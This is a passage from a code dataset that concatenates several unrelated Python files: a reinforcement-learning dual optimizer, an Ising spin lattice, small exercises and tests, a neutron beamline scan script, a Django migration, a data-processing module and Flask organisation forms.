input[0]\n param_omega = input[1]\n\n # ha(s): eta * (\\varphi(s)^T * K^T * \\Sigma^{-1} + W_{sa}) + wa(s))\n ha = np.dot(varphis, param_eta * np.dot(Kt, prec) + Wsa) + wa\n\n # hss(s): eta * (\\varphi(s)^T * K^T * \\Sigma^{-1} * K * \\varphi(s))\n varphisKt = np.dot(varphis, Kt)\n hss = param_eta * np.sum(np.dot(varphisKt, prec) * varphisKt, axis=1)\n\n Haa = param_eta * prec + Waa\n # Haa = 0.5 * (Haa + np.transpose(Haa))\n HaaInv = np.linalg.inv(Haa)\n\n # The two terms 'term1' and 'term2' which come from normalizers of the\n # 1. Original policy distribution\n # 2. The distribution after completing the square\n sigma = np.linalg.inv(prec)\n\n term1 = -0.5 * param_eta * np.linalg.slogdet(2 * np.pi * sigma)[1]\n if self.beta == 10000000:\n term2 = 0.5 * param_eta * np.linalg.slogdet(\n 2 * np.pi * param_eta * HaaInv)[1]\n else:\n term2 = 0.5 * (param_eta + param_omega) * np.linalg.slogdet(\n 2 * np.pi * (param_eta + param_omega) * HaaInv)[1]\n \n dual = param_eta * self.epsilon - param_omega * beta + \\\n term1 + term2 + np.mean(\n 0.5 * (np.sum(np.dot(ha, HaaInv) * ha, axis=1) - hss))\n\n return dual\n\n # Automatic gradient of the dual\n eval_dual_grad = grad(eval_dual)\n\n if True:\n def fx(x):\n eta, omega = x # eta: Lagrange variable of KL constraint, omega: of the entropy constraint\n error_return_val = 1e6, np.array([0., 0.])\n if eta + omega < 0:\n return error_return_val\n if not is_valid_eta_omega(eta, omega, w_theta):\n return error_return_val\n return eval_dual(x), eval_dual_grad(x)\n else:\n def fx(x):\n eta, omega = x # eta: Lagrange variable of KL constraint, omega: of the entropy constraint\n error_return_val = 1e6, np.array([0., 0.])\n if eta + omega < 0:\n return error_return_val\n if not is_valid_eta_omega(eta, omega, w_theta):\n return error_return_val\n return eval_dual(x), eval_dual_grad(x) # L-BFGS-B expects double floats\n # return np.float64(eval_dual(x)), np.float64(eval_dual_grad(x)) # L-BFGS-B expects double floats\n\n logger.log('optimizing dual')\n\n # Make sure valid initial covariance matrices\n while (not is_valid_eta_omega(x0[0], x0[1], w_theta)):\n x0[0] *= 2\n logger.log(\"Eta increased: \" + str(x0[0]))\n\n if eta is None:\n omega_lower = -100\n res = scipy.optimize.minimize(fx, x0, method='SLSQP', jac=True,\n bounds=((1e-12, 1e6), (omega_lower, 1e6)), options={'ftol': 1e-12})\n else:\n omega_lower = -100\n eta_lower = np.max([eta - 1e-3, 1e-12])\n res = scipy.optimize.minimize(fx, x0, method='SLSQP', jac=True,\n bounds=((eta_lower, eta + 1e-3), (omega_lower, 1e6)), options={'ftol': 1e-16})\n\n # Make sure that eta + omega > 0\n if res.x[0] + res.x[1] <= 0:\n res.x[1] = 1e-6 - res.x[0]\n\n if self.beta == 1000000:\n res.x[1] = 0\n\n logger.log(\"dual optimized, eta: \" + str(res.x[0]) + \", omega: \" + str(res.x[1]))\n return res.x[0], res.x[1]\n\n # def f(x, grad):\n # if grad.size > 0:\n # grad[:] = eval_dual_grad(x)\n #\n # return np.float64(eval_dual(x))\n\n # self.nlopt_opt.set_min_objective(f)\n # # Set parameter boundaries: eta, omega > 0\n # self.nlopt_opt.set_lower_bounds([1e-12, 1e-12])\n #\n # self.nlopt_opt.set_ftol_rel(1e-12)\n # self.nlopt_opt.set_xtol_rel(1e-12)\n # self.nlopt_opt.set_vector_storage(100)\n\n # try:\n # x = self.nlopt_opt.optimize([self.param_eta, self.param_omega])\n # except RuntimeError:\n # entropy = np.mean(self.policy.distribution.entropy_log_probs(samples_data[\"agent_infos\"]))\n # if entropy < 1e-9:\n # # ignore error since we already converged and are at the optimal policy\n # x = [eta_before, omega_before]\n # else:\n # print(\"Error during optimization of the dual...\")\n # raise\n\n # logger.log('dual optimized')\n #\n # # get optimal values\n # return x[0], x[1]\n\n def init_eta_omega(self, beta, epsilon, init_eta, init_omega):\n # Here we define the symbolic function for the dual and the gradient\n\n self.beta = beta\n self.epsilon = epsilon\n\n # Init dual param values\n self.param_eta = init_eta\n self.param_omega = init_omega\n\n self.param_eta_non_lin = init_eta\n self.param_omega_non_lin = init_omega\n\n param_eta = tf.placeholder(dtype=tf.float32, shape=[], name=\"param_eta\")\n param_omega = tf.placeholder(dtype=tf.float32, shape=[], name=\"param_omega\")\n old_entropy = tf.placeholder(dtype=tf.float32, shape=[], name=\"old_entropy\")\n\n varphis = tf.placeholder(dtype=tf.float32, shape=[None, None], name=\"varphis\")\n Kt = tf.placeholder(dtype=tf.float32, shape=[None, None], name=\"Kt\")\n prec = tf.placeholder(dtype=tf.float32, shape=[None, None], name=\"prec\")\n Waa = tf.placeholder(dtype=tf.float32, shape=[None, None], name=\"Waa\")\n Wsa = tf.placeholder(dtype=tf.float32, shape=[None, None], name=\"Wsa\")\n wa = tf.placeholder(dtype=tf.float32, shape=[None, None], name=\"wa\")\n\n if self.beta == 100000000:\n beta = 0\n else:\n beta = old_entropy - self.beta\n\n ha = tf.matmul(varphis, param_eta * tf.matmul(Kt, prec) + Wsa) + wa\n \n varphisKt = tf.matmul(varphis, Kt)\n hss = param_eta * tf.reduce_sum(tf.matmul(varphisKt, prec) * varphisKt, axis=1)\n\n Haa = param_eta * prec + Waa\n HaaInv = tf.matrix_inverse(Haa)\n\n sigma = tf.matrix_inverse(prec)\n term1 = -0.5 * param_eta * tf.log(tf.matrix_determinant(2 * np.pi * sigma))\n if self.beta == 1000000:\n term2 = 0.5 * param_eta * tf.log(tf.matrix_determinant(2 * np.pi * param_eta * HaaInv))\n else:\n term2 = 0.5 * (param_eta + param_omega) * tf.log(tf.matrix_determinant(2 * np.pi * (param_eta + param_omega) * HaaInv))\n\n dual = param_eta * self.epsilon - param_omega * beta + \\\n term1 + term2 + tf.reduce_mean(\n 0.5 * (tf.reduce_sum(tf.matmul(ha, HaaInv) * ha, axis=1) - hss))\n\n # Symbolic dual gradient\n dual_grad = tf.gradients(xs=[param_eta, param_omega], ys=dual)\n\n # Eval functions.\n f_dual = U.function(\n inputs=[varphis, Kt, prec, Waa, Wsa, wa] + [param_eta, param_omega, old_entropy],\n outputs=dual,\n )\n\n f_dual_grad = U.function(\n inputs=[varphis, Kt, prec, Waa, Wsa, wa] + [param_eta, param_omega, old_entropy],\n outputs=dual_grad,\n )\n\n self.opt_info = dict(\n f_dual=f_dual,\n f_dual_grad=f_dual_grad,\n )\n\n","sub_path":"baselines/copos/eta_omega_dual.py","file_name":"eta_omega_dual.py","file_ext":"py","file_size_in_byte":9884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"319012310","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport scipy.linalg as lg\n#import matplotlib.pyplot as plt\nfrom random import randint as rand\nfrom random import uniform as randu\n\nimport Lattice\n#interaction_type ,symmetry,boundary_type, n_column ,n_row, j_column_column,j_row_row\nclass SpinLattice2D(Lattice.SpinLattice):\n def __init__(self, settings_list ):\n self.boundary_type =settings_list[0]['general_settings']['boundary_type']\n self.interaction_type =settings_list[0]['general_settings']['interaction_type']\n self.lattice_geometry = settings_list[0]['general_settings']['lattice_geometry']\n self.quench_disorder = settings_list[0]['general_settings']['quench_disorder']\n self.symmetry = settings_list[0]['general_settings']['symmetry']\n if (self.lattice_geometry == 'square'):\n self.n_column = settings_list[1]['geometry_settings']['n_column']\n self.n_row = settings_list[1]['geometry_settings']['n_row']\n self.j_column_column = settings_list[1]['geometry_settings']['j_column_column']\n self.j_row_row = settings_list[1]['geometry_settings']['j_row_row']\n if self.quench_disorder == 'yes':\n self.num_quenches = settings_list[2]['quenches_settings']['num_quenches']\n self.quenches_locations = []\n for item in range(self.num_quenches):\n # 2D lattice\n q_row = settings_list[2]['quenches_settings']['quenches_locations'][item][0]\n q_column = settings_list[2]['quenches_settings']['quenches_locations'][item][1]\n q_bond = settings_list[2]['quenches_settings']['quenches_locations'][item][2]\n if q_row <= self.n_row-1 and q_column<=self.n_column and q_bond <=1: \n self.quenches_locations.append(settings_list[2]['quenches_settings']['quenches_locations'][item])\n else:\n self.quenches_locations.append([-2,-2,-2])\n # \n def num_bonds():\n if self.symmetry == 'Z2':\n if self.interaction_type == 'nn':\n if self.boundary_type == 'np':\n if self.lattice_geometry=='square':\n return (self.n_row)*(self.n_column -1) + (self.n_column) * (self.n_row-1)\n #\n def build_lattice():\n lattice = []\n if self.lattice_geometry == 'square':\n for idx_row in range(self.n_row):\n lattice.append(np.ones(self.n_column))\n return lattice\n #\n self.lattice = build_lattice()\n #\n self.num_bonds = num_bonds() \n #\n #flip_dipole the same\n #\n def get_lattice_energy(self):\n if self.lattice_geometry=='square':\n return Lattice.SpinLattice.get_lattice_energy(self)\n \n def get_local_energy_change(self, idx_column,idx_row):\n if self.quench_disorder == 'yes':\n dE = 0\n # count = 0\n j_row_row = self.j_row_row\n j_column_column = self.j_column_column \n n_column = self.n_column\n n_row = self.n_row\n switch1 = 0\n switch1row = 0\n switch1col = 0\n switch2 = 0 \n switch3 = 0 \n for quench in self.quenches_locations:\n #coincides with a disorder\n if idx_row == quench[0] and idx_column == quench[1]:\n switch1 = 1 \n if quench[2]==0:\n if switch1row != 1:\n switch1row = 1\n if quench[2]==1:\n if switch1col !=1:\n switch1col = 1\n # below to a disorder\n if idx_row-1 == quench[0] and idx_column == quench[1] and quench[2]==0:\n switch2 = 1 \n # left\n if idx_row == quench[0] and idx_column-1 == quench[1] and quench[2] == 1:\n switch3 = 1 \n #\n #\n if switch1 ==1:\n if idx_row != n_row-1:\n if switch1row == 1 :\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row+1][idx_column].item() *\\\n -1 * j_row_row\n else:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row+1][idx_column].item() *\\\n +1 * j_row_row\n #\n if idx_column != n_column-1:\n if switch1col == 1 :\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row][idx_column+1].item() * \\\n -1 * j_column_column\n else:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row][idx_column+1].item() * \\\n +1 * j_column_column\n else:\n if idx_row != n_row-1:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row+1][idx_column].item() *\\\n +1 * j_row_row\n if idx_column != n_column-1:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row][idx_column+1].item() * \\\n +1 * j_column_column\n #\n if switch2 == 1:\n if idx_row != 0:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row-1][idx_column].item() *\\\n -1 * j_row_row\n else:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row-1][idx_column].item() *\\\n +1 * j_row_row\n #\n if switch3 == 1:\n if idx_column != 0:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row][idx_column-1].item() *\\\n -1 * j_column_column\n else:\n if idx_column != 0:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row][idx_column-1].item() *\\\n +1 * j_column_column\n return -2*dE\n else:\n return Lattice.SpinLattice.get_local_energy_change(self, idx_column, idx_row)\n \n \n \n \n \n \n \n \n \n \n ","sub_path":"SpinLattices/Lattices/Lattice2D.py","file_name":"Lattice2D.py","file_ext":"py","file_size_in_byte":6997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"571082174","text":"print('---------------------MAXIMUM AND MINIMUM VALUE---------------------')\nnam_list = []\ncount = 0\ntotal = 0\n#use of the while loop for value being input is true\nwhile True:\n nam = input('Enter a number: ')\n if str(nam) == 'done' or str(nam) == 'DONE':\n break\n try:\n count = count + 1\n total = total + int(nam)\n nam_list += [int(nam)] #creating a list of all numbers being input\n except:\n print(\"invalid input\")\n\nmax1 = max(nam_list) #getting the maximum value from the list\nmin1 = min(nam_list) #getting the minimum value from the list\n\nprint('------------------------------------------------------------------')\nprint('Total: ', total)\nprint('Count: ', count)\nprint('List of Numbers is: ', nam_list)\nprint('Maximum number is: ', max1)\nprint('Minimum number is: ', min1)","sub_path":"src/chapter5/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"350622620","text":"import unittest\nfrom . views import fibcal\n\nclass TestFibCalMethods(unittest.TestCase):\n\n\t# Test case for checking positive number\n def test_cal(self):\n res = fibcal(10)\n self.assertEqual(res, 55)\n\n\t# Test case for checking negative number\n def testNegative(self):\n res = fibcal(-1)\n self.assertTrue(res , None)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"FibCal/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"352374855","text":"#!/usr/bin/python\n\nfrom epics import caget\nfrom scan import *\nimport os\nimport sys\nimport numpy as np\nfrom operator import __truediv__\nsys.path.append('/home/bl-user/Script_Test/')\nfrom CNCS_scanfunction_general_dict import *\n\nprint(\"########################################################################\")\nprint(\"# #\")\nprint(\"# Hello from Bl-5, CNCS is ready to collect your data #\")\nprint(\"# #\")\nprint(\"########################################################################\")\n\n\nnewscan()\nresettime()\n\n#set this flag to \"1\" if you want to submit, otherwise set to \"0\" if you want to simulate\nsubmit_flag = 1\n\nif submit_flag:\n #for now, put the choppers in Energy Phase Entry Mode\n caput('BL5:Chop:Skf1:PhaseEntryMode', 1)\n caput('BL5:Chop:Skf2:PhaseEntryMode', 1)\n caput('BL5:Chop:Skf3:PhaseEntryMode', 1)\n caput('BL5:Chop:Skf4:PhaseEntryMode', 1)\n caput('BL5:Chop:Skf5:PhaseEntryMode', 1)\n caput('BL5:Chop:Skf1:SpeedReq', 60.0)\n caput('BL5:Chop:Skf2:SpeedReq', 60.0)\n caput('BL5:Chop:Skf3:SpeedReq', 60.0)\n caput('BL5:Chop:Skf4:SpeedReq', 60.0)\n caput('BL5:Chop:Skf5:SpeedReq', 60.0)\n caput('BL5:Chop:Skf45:DblDiskModeReq', 1, wait = True)\n\n\n\ntitle('V-foil white beam, Ei={0} meV 300 K'.format(3.32))\nei(3.32)\nstart()\nwaitPC(10.0)\nstop()\n\nloadconf('high_flux.sav')\n\nif submit_flag:\n submit('quasi white beam 3.32 meV, 10C, 2hrs')\nelse:\n simulate('quasi white beam 3.32 meV, 10C, 2hrs')\n\nestimatetime()\n","sub_path":"detector-normalization/Quasi_White_Beam_3p32meV_2hrs_10C.py","file_name":"Quasi_White_Beam_3p32meV_2hrs_10C.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"174174096","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('predio', '0010_auto_20150422_1609'),\n ('usos_suelo', '0006_auto_20150424_0402'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='BosquesAreasConservacion',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('area_regeneracion_natural', models.IntegerField()),\n ('area_cultivada', models.IntegerField()),\n ('matas_monte', models.IntegerField()),\n ('morichal', models.IntegerField()),\n ('estereo', models.IntegerField()),\n ('raudal', models.IntegerField()),\n ('predio', models.ForeignKey(to='predio.InfoPredioGeneral')),\n ],\n ),\n migrations.RemoveField(\n model_name='conservacionnatural',\n name='predio',\n ),\n migrations.DeleteModel(\n name='ConservacionNatural',\n ),\n ]\n","sub_path":"usos_suelo/migrations/0007_auto_20150424_0434.py","file_name":"0007_auto_20150424_0434.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"118541766","text":"import pandas as pd\nimport numpy as np\nimport os\nimport pickle\nimport numbers\nfrom collections import Counter\nimport torch\nfrom torchtext.vocab import Vocab\n\ndef read_data(\n data_fp, drop_duplicates=False, check=True, y_target=None, uid=None, test=0\n):\n \"\"\"\n Function to read-in, check and process raw 365 training or test data\n \n Arguments:\n ----------\n data_fp (str) : filepath to csv\n drop_duplicates (bool) : drop duplicate UID (must provide uid)\n check (bool) : check for data quality (nrows, duplicates, label ratio)\n must provide uid, y_target\n y_target (str) : default None\n column name of label\n uid (str) : default None\n column name of UID of dataset (usually patient_id + discharge_id)\n test (int) : default 0\n if not zero, will read in test number of rows\n \n Returns:\n --------\n data_df (dataframe) : cleaned dataframe\n \n \"\"\"\n if not os.path.isfile(data_fp):\n raise Exception(f\"Invalid data filepath: {data_fp}\")\n\n if test:\n data_df = pd.read_csv(data_fp, low_memory=False, nrows=test)\n else:\n data_df = pd.read_csv(data_fp, low_memory=False)\n print(f\"Read data from {data_fp}\\n\")\n\n num_dropped = 0\n if drop_duplicates:\n if uid not in data_df.columns:\n raise Exception(\"Missing UID, unable to drop duplicates\")\n\n num_droppped = data_df.shape[0]\n data_df.drop_duplicates(uid, inplace=True)\n num_dropped -= data_df.shape[0]\n\n if check:\n print(\"=\" * 20 + \"Checking data\" + \"=\" * 20 + \"\\n\")\n print(f\"Data size: {data_df.shape}\\n\")\n\n if drop_duplicates:\n print(f\"Number of duplicate rows: {num_dropped}\\n\")\n\n if (y_target is not None) and (y_target in data_df.columns):\n print(f\"Label ratio for {y_target}\")\n print(data_df[y_target].value_counts(normalize=True))\n\n if (uid is not None) and (uid in data_df.columns):\n nb_duplicates = data_df[uid].duplicated().sum()\n print(f\"\\nDischarge_id duplicates: {nb_duplicates}\")\n\n return data_df\n\n\ndef remove_death(data_df, y_target, x_inputs, bad_word=\"death\"):\n \"\"\"\n Removes any rows in data that contains unwanted words, i.e. death\n in any of the x_input columns\n \n Arguments:\n ----------\n data_df (dataframe) : data to process\n x_inputs (list) : list of input columns to consider when removing words\n y_target (str) : column name of label \n bad_word (str) : word used to decide which rows to remove\n \n Returns:\n --------\n data_df_str (dataframe) : data with rows containing unwanted words removed\n \n \n \"\"\"\n data_df_str = data_df.astype(str)\n data_df_str[y_target] = data_df[y_target].astype(int).tolist()[:]\n\n indices = set()\n for input_col in x_inputs:\n indices.update(data_df_str[data_df_str[input_col].str.contains(bad_word)].index)\n\n print(\"\\n\" + \"=\" * 20 + \"Removing bad word data\" + \"=\" * 20 + \"\\n\")\n print(f\"Removing bad words: {len(indices)} rows contain the word {bad_word}\")\n\n return data_df[~data_df.index.isin(indices)]\n\ndef build_vocab(\n data_df,\n feat_colnames,\n y_target=\"unplanned_readmission\",\n min_freq=1,\n specials=[\"\", \"\"],\n pos_labs_vocab=True,\n):\n \"\"\"\n Create a vocabulary: This maps all events to an index, including \n : index 0, sentence padding\n : index 1, unknown events\n nan : index 2, no events\n \n Arguments:\n ----------\n data_df (dataframe) : containing features & target\n feat_colnames (list) : input column names to build vocab\n y_target (str) : target column name\n min_freq (int) : minimum frequency for vocab\n specials (list) : special characters (padding, unknown)\n pos_labs_vocab (bool) : to use only words from minority/pos class\n \n Returns:\n --------\n vocab (Vocab) \n \"\"\"\n\n def build_counter(data_df, feat_colnames):\n counter = Counter()\n words = data_df[feat_colnames].values.ravel(\"K\")\n print(\"start word number: \", words.shape)\n\n new_words = []\n\n for x in words:\n x = str(x)\n x = x.replace(\"d_s\", \"d_\")\n new_words.extend(x.replace(\" \", \"\").split(\",\"))\n\n print(\"exact word number: \", len(new_words))\n\n counter.update(new_words)\n\n if not isinstance(min_freq, numbers.Number):\n raise ValueError(f\"Something wrong with {min_freq}\")\n\n return counter\n\n print(\"\\n\" + \"=\" * 20 + \"Build vocabulary\" + \"=\" * 20 + \"\\n\")\n vocab_df = data_df\n if pos_labs_vocab:\n vocab_df = data_df[data_df[y_target] == True]\n\n counter = build_counter(vocab_df, feat_colnames)\n\n vocab = Vocab(counter, min_freq=min_freq, specials=specials, specials_first=True)\n\n print(f\"Completed vocabulary: {len(vocab)} vocabs\")\n\n return vocab","sub_path":"model/readmission/transformer/data_proc.py","file_name":"data_proc.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"178408598","text":"from wtforms import Form, TextField, PasswordField, HiddenField, ValidationError, IntegerField, DateField\nfrom wtforms import validators as v\nfrom wtforms import SelectMultipleField, Form\nfrom flask_login import current_user\nfrom flask.ext.sauth.models import User, authenticate\nfrom e_organisation.models import *\n\n\nclass AddOrganisationForm( Form):\n org_name =TextField( validators=[v.DataRequired(), v.Length(max=255)])\n branches =TextField()\n states =TextField( )\n areas =TextField( )\n regions =TextField( )\n postal_address =TextField( validators=[v.DataRequired(), v.Length(max=100)])\n postal_telephone =TextField( validators=[v.DataRequired(), v.Length(max=20)])\n postal_tele_code =TextField( validators=[v.DataRequired(), v.Length(max=5)])\n postal_code =TextField( validators=[v.DataRequired(), v.Length(max=10)])\n postal_country =TextField( validators=[v.DataRequired(), v.Length(max=100)])\n postal_state =TextField( validators=[v.DataRequired(), v.Length(max=100)])\n postal_city =TextField( validators=[v.DataRequired(), v.Length(max=100)])\n email =TextField( validators=[v.DataRequired(), v.Email(), v.Length(max=256), v.Email()])\n\n def validate_org_name(form, field):\n org_name = field.data.lower().strip()\n if EsthenosOrg.objects(name=org_name).count():\n raise ValidationError(\"Hey! This organisation is already registered with us\")\n\n def save(self):\n org = EsthenosOrg(name=self.org_name.data)\n org.postal_address =self.postal_address.data\n org.postal_telephone =self.postal_telephone.data\n org.postal_tele_code =self.postal_tele_code.data\n org.postal_country =self.postal_country.data\n org.postal_state =self.postal_state.data\n org.postal_city =self.postal_city.data\n org.postal_code = self.postal_code.data\n org.email = self.email.data\n org.admins.append(EsthenosUser.objects.get(id=current_user.id))\n\n org.save()\n return org\n\n\nclass RegistrationFormAdmin( Form):\n type = HiddenField()\n name = TextField( validators=[v.DataRequired(), v.Length(max=256)])\n email = TextField( validators=[v.DataRequired(), v.Email(), v.Length(max=256)])\n password = PasswordField( validators=[v.DataRequired(), v.Length(max=256)])\n\n def validate_email(form, field):\n email = field.data.lower().strip()\n if EsthenosUser.objects(email=email).count():\n raise ValidationError( \"Hey! This email is already registered with us. Did you forget your password?\")\n\n def save(self):\n user = EsthenosUser.create_user( self.name.data, self.email.data, self.password.data, email_verified=True)\n user.save()\n return user\n\n\nclass AddOrganizationEmployeeForm(Form):\n last_name_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n first_name_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n id_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n valid_email_add_organisation = TextField( validators=[v.DataRequired(), v.Email(), v.Length(max=256)])\n active = TextField( validators=[v.Length(max=255)])\n gender = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n date_of_joining = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n\n email_add_organisation = TextField( validators=[v.DataRequired(), v.Email(), v.Length(max=256)])\n password_add_organisation = PasswordField(validators=[v.DataRequired(), v.Length(max=30)])\n\n role = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n\n address_add_org_emp = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n city_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n state_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n country_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n teleno_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n tele_code_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n postal_code_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n\n states = SelectMultipleField('states')\n regions = SelectMultipleField('regions')\n areas = SelectMultipleField('areas')\n branches = SelectMultipleField('branches')\n centers = SelectMultipleField('centers')\n\n def validate_email_add_organisation(form, field):\n email_add_organisation = field.data.lower().strip()\n if EsthenosUser.objects(email=email_add_organisation).count():\n raise ValidationError( \"Hey! This email is already registered with us. Did you forget your password?\")\n\n def save(self, org_id):\n emp = EsthenosUser.create_user(self.first_name_add_organisation.data,\n self.email_add_organisation.data,\n self.password_add_organisation.data)\n\n emp.last_name = self.last_name_add_organisation.data\n emp.first_name = self.first_name_add_organisation.data\n\n emp.usr_id = self.id_add_organisation.data\n emp.notify_email = self.valid_email_add_organisation.data\n\n emp.email = self.email_add_organisation.data\n emp.gender = self.gender.data\n emp.active = False\n\n emp.date_of_birth = self.date_of_joining.data\n emp.postal_address = self.address_add_org_emp.data\n emp.postal_code = self.postal_code_add_organisation.data\n emp.postal_city = self.city_add_organisation.data\n emp.postal_state = self.state_add_organisation.data\n emp.postal_country = self.country_add_organisation.data\n emp.postal_telephone = self.teleno_add_organisation.data\n emp.postal_tele_code = self.tele_code_add_organisation.data\n\n emp.hierarchy = EsthenosOrgHierarchy.objects.get(id=self.role.data)\n emp.organisation = EsthenosOrg.objects.get(id=org_id)\n emp.save()\n\n org = EsthenosOrg.objects.get(id=org_id)\n org.update(inc__employee_count=1)\n return emp\n\n #def deselect_employee_geo(self, emp):\n # emp.access_states = []\n # emp.access_regions = []\n # emp.access_areas = []\n # emp.access_centers = []\n # emp.save()\n\n def update(self, emp):\n errors = {}\n emp.last_name = self.last_name_add_organisation.data\n emp.first_name = self.first_name_add_organisation.data\n emp.usr_id = self.id_add_organisation.data\n emp.notify_email = self.valid_email_add_organisation.data\n\n emp.gender = self.gender.data\n emp.active = True if self.active.data == \"active\" else False\n\n emp.date_of_birth = self.date_of_joining.data\n emp.postal_address = self.address_add_org_emp.data\n emp.postal_code = self.postal_code_add_organisation.data\n emp.postal_city = self.city_add_organisation.data\n emp.postal_state = self.state_add_organisation.data\n emp.postal_country = self.country_add_organisation.data\n emp.postal_telephone = self.teleno_add_organisation.data\n emp.postal_tele_code = self.tele_code_add_organisation.data\n\n emp.save()\n if self.role.data != '':\n emp.hierarchy = EsthenosOrgHierarchy.objects.get(id=self.role.data)\n\n to_save = True\n\n selections = []\n #self.deselect_employee_geo(emp)\n #todo centralize the level assignments\n if emp.hierarchy.level == 3:\n for state in self.states.data:\n state = EsthenosOrgState.objects.get(id=state)\n regions = map(lambda r: str(r.id), state.regions)\n commons = set.intersection(set(regions), self.regions.data)\n if not len(commons) and state.owner == None:\n state.owner = emp\n state.save()\n selections.append(state)\n elif state.owner!=None:\n errors[\"states\"] = \"A selected state has already been assigned.\"\n if len(selections)<1:\n to_save = False\n errors[\"not_selected\"] = \"The employee needs to be assigned a state.\"\n if len(selections) != 0:\n emp.access_states = selections\n\n selections = []\n #todo centralize the level assignments\n if emp.hierarchy.level == 4:\n for region in self.regions.data:\n region = EsthenosOrgRegion.objects.get(id=region)\n areas = map(lambda r: str(r.id), region.areas)\n commons = set.intersection(set(areas), self.areas.data)\n if not len(commons) and region.owner == None:\n region.owner = emp\n region.save()\n selections.append(region)\n elif region.owner!=None:\n errors[\"regions\"] = \"A selected region has already been assigned\"\n if len(selections)<1:\n to_save = False\n errors[\"not_selected\"] = \"The employee needs to be assigned a region.\"\n if len(selections) != 0:\n emp.access_regions = selections\n\n selections = []\n #todo centralize the level assignments\n if emp.hierarchy.level == 5:\n for area in self.areas.data:\n area = EsthenosOrgArea.objects.get(id=area)\n branches = map(lambda r: str(r.id), area.branches)\n commons = set.intersection(set(branches), self.branches.data)\n if not len(commons) and area.owner == None:\n area.owner = emp\n area.save()\n selections.append(area)\n elif area.owner!=None:\n errors[\"areas\"] = \"A selected area has already been assigned.\"\n if len(selections)<1:\n to_save = False\n errors[\"not_selected\"] = \"The employee needs to be assigned an area.\"\n if len(selections) != 0:\n emp.access_areas = selections\n\n selections = []\n #todo centralize the level assignments\n if emp.hierarchy.level >= 6:\n for branch in self.branches.data:\n branch = EsthenosOrgBranch.objects.get(id=branch)\n centers = map(lambda r: str(r.id), branch.centers)\n commons = set.intersection(set(centers), self.centers.data)\n if not len(commons):\n if emp.hierarchy.level == 6 and branch.owner == None:\n branch.owner = emp\n branch.save()\n selections.append(branch)\n elif emp.hierarchy.level == 6 and branch.owner!=None:\n errors[\"branches\"] = \"A selected branch has already been assigned.\"\n if emp.hierarchy.level == 7:\n if branch.owner == emp:\n branch.owner = None\n branch.save()\n selections.append(branch)\n if len(selections)<1:\n to_save = False\n errors[\"not_selected\"] = \"The employee needs to be assigned a branch.\"\n\n if len(selections) != 0:\n emp.access_branches = selections\n\n selections = []\n #todo centralize the level assignments\n if emp.hierarchy.level == 7:\n for center in self.centers.data:\n selections.append(EsthenosOrgCenter.objects.get(id=center))\n if len(selections) != 0:\n emp.access_centers = selections\n\n if len(emp.branches)>1 and emp.hierarchy.level == 7:\n to_save = False\n errors[\"not_selected\"] = \"The employee can only be assigned a single branch.\"\n\n if to_save:\n emp.save()\n return emp, errors\n\n\nclass AddOrganisationProductForm( Form):\n product_name=TextField( validators=[v.Length(max=255)])\n\n loan_type=TextField( validators=[v.Length(max=255)])\n loan_amount=TextField( validators=[ v.Length(max=255)])\n loan_tenure=TextField( validators=[ v.Length(max=255)])\n\n life_insurance=TextField( validators=[ v.Length(max=255)])\n eligible_cycle=TextField( validators=[ v.Length(max=255)])\n number_installments=TextField( validators=[ v.Length(max=255)])\n\n emi=TextField( validators=[ v.Length(max=255)])\n emi_repayment=TextField( validators=[ v.Length(max=255)])\n last_emi=TextField( validators=[ v.Length(max=255)])\n\n service_tax=TextField( validators=[ v.Length(max=255)])\n interest_rate=TextField( validators=[ 